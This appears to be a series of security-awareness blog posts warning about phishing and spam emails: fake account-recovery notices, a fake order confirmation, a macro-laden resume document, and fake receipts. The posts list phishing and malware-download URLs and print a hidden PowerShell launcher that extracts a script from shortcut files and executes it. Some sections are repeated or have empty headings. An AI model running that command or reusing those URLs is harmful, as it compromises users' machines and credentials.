Security alert for your linked account #28868 - Fake outlook.com account recovery messages

Watch out for these fake account recovery messages as they are finding their way into outlook.com and hotmail.com!

Your profile is listed as the recovery email for recipient@hotmail.com. Don't recognize this profile? click here.           Sign-in attempt was blocked for your linked account recipient@hotmail.com Someone just used your password to try to sign in to your profile.   CHECK ACTIVITY             You received this email to let you know about important changes to your profile and services. © 2018 1600 Amphitheatre Parkway, Mountain View, CA 94043, USA

 

The actual links point to: http://wiki.1rwn.com/ctireaz/radiantlyb.html  from both ther check activity link and the click here link under 'recognize this profile'

The link is not dangerous - it just forwards you to a Canadian Pharmacy page - but do report the originator of the email and the website as neither will be very nice people.

Your Email Domain Account Notification!! Spam

This email has been doing the rounds today:

 The 'verify' link actually points to: https://caravanecafe.ca/mikoko/Qupdate/index.php?email=name@domain.com&browser=unkonown&time=valid which has already been marked as deceptive by the big browsers:

The website itself:

Is fairly convincing looking and I will type them a nice message in the password field commending them on their good work and encouraging them to continue.

The password actually appears to do a lookup of some kind as it reports that it is wrong but perhaps they just want to get as many of your passwords as possible...?

Anyway, stay vigilant and safe!

Spam Warning: Notice from UPS

This is a bit of a confusing one as they do not seem to know who they are, HelloFax or UPS.

Here is the message:

Spam Warning: Your Name, Pack(4M0A_8141) confirmed: 5 items sent

This email has been spotted this week:

From: lou_weihe@clarityconfidenceandcash.com

Sent:                                                         Monday, July 30, 2018 10:52 PM

To:                                                            Recipient

Subject:                                                   Your, Name Pack(4M0A_8141) confirmed: 5 items sent

 

Your order confirmation. Hi Simon, Great news! Your order is now confirmed. We will email you again when your items ship.

WOMEN MEN ACCESSORIES HOME DECOR GADGETS Hi Your Name, Great news! Your order is now confirmed. We will email you again when your items ship. Thanks for shopping with us! Order ID: 4M0A_8141 Shipping Address: Your Name Your Phone Your Postcode  View Order This email was sent from a notification-only address that cannot accept incoming emails. Please do not reply to this message. If you have any questions or concerns, please contact us

 

The 'view order' link points to: https://johanwolf.com/.advice/4M0A_8141-order-Receipt

Which downloads a file: 4M0A_8141-order-Receipt.zip

Zip files are not often used as orders anyway but this website, https://johanwolf.com obviously has a valid certificate and is being misused by someone. The website just seems to forward to Office365 support for some reason???

 

If you unzip the file that is provided you see an image:

 

 

Which presumably pretends to be a real company.

 

And a file which runs a script:

 

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -nop -executionpolicy bypass -win hidDEN  -comman cd %USERPROFILE%\Documents; findstr /s bremodilu ..\*.lnk > file.ps1;.\file.ps1;exit

 

Which will make serious changes to your system. Looking at this we are not sure it would work but might try it on an old PC ..?

 

We will let you know.

 

Anyway, report the sender and the website and keep vigilant!

 

About a internship! Fake Resume or CV SPAM!

Microsoft Office documents are a dangerous source of macros and other types of malware. Typically a dangerous document will be disabled by later versions of Microsoft Office in order to protect the user and as a result the modern spam malware office docs have a front page explaining that they need to be unlocked.

Let's have a quick look at one:

Here is a message containing a resume we have received today...

Hello there! I hope you are well!

I am absolutely interested in a internship.
Find my attached resume and reply ASAP.

The password for the file is 123123

Looking forward to hearing back from you!
Dayna

If we double-click the attachment containing 'Danya's Resume' we see the password request in Microsoft Word 2016.

We enter the password provided and then...

The text in the document pane has actually been added by the spammers. That 'was this information helpful?' text is just an image captured from the Microsoft website just as we have captured this image from the spammers. The 'Yes' and 'No' buttons are not live - they are just there to persuade you that this is a Microsoft message. The text is there to persuade you to enable the macros in this document but definitely do not.

The only true Microsoft advice here is in yellow at the top where you are 'Be careful-email attachments can contain viruses. Unless you need to edit, it's safer to stay in protected view.' and it is. We would suggest that unless you are awaiting the document and it is from the person you are expecting it to be from, never enable a Microsoft Document for editing.

Let us make sure that this document is not one we are expecting - if we click on the File menu on Microsoft Word and select the Info option we can see the below:

As we can see from the details, this document is nonsense and is not from anyone we know or want to know.

Label these as spam and report the originator to your email administrator or provider.

We have seen the following alternate subjects for the same email:

1. About a career?
2. Concerning a internship.
3. Regarding a career!
4. Regarding a job?

Mac Detox Software - is it a good thing?

If you are a Mac user then you will find your computer slowing down just like anyone else's. There is a finite amount of processing power, RAM space and disk throughput that will eventually be maxed-out by the softwares you are running.

The Mac does not have a registry like Windows where the system needs all sorts of details to reference what processes are running and so it is not difficult to remove unwanted start-up programs.

There is a great article on what to do here: https://www.macworld.com/article/2047747/take-control-of-startup-and-login-items.html

MAc detox software - even if it is free - is coming at a cost, whether they are corrupting your browser search results or just recording your activity, you do not need proprietary software to clean a Mac.

We have been seeing a lot of sircles blog spam recently trying to add forwards and links to various Mac clean-up sites and we do not recommend using any. Stick to the trusted sites for information, such as MacWorld and keep your MAc clean of software that may cause more problems than your computer just being slow.

Natwest Spam: Incomplete Security Information

You may receive the following message, purporting to be from Natwest:

Disability Action Alliance - DAA Receipt#

Spam: Receipt # 255247

Beware of these fake receipts:

Payment Receipt

YOUR PAYMENT HAS BEEN PROCESSED

We send  Google.Docs document.

Link points to: https://www.ethereumpower.io/itr_inv_doc.zip

Which obviously downloads a inv doc.zip file to corrupt your computer or add a root kit etc.

We have reported the Google link and the website as well as marking the email as spam - please do the same if you receive one of these.

Spam: Receipt # 255247

Beware of these fake receipts:

Payment Receipt

YOUR PAYMENT HAS BEEN PROCESSED

We send  Google.Docs document.

Link points to: https://www.ethereumpower.io/itr_inv_doc.zip

Which obviously downloads a inv doc.zip file to corrupt your computer or add a root kit etc.

We have reported the Google link and the website as well as marking the email as spam - please do the same if you receive one of these.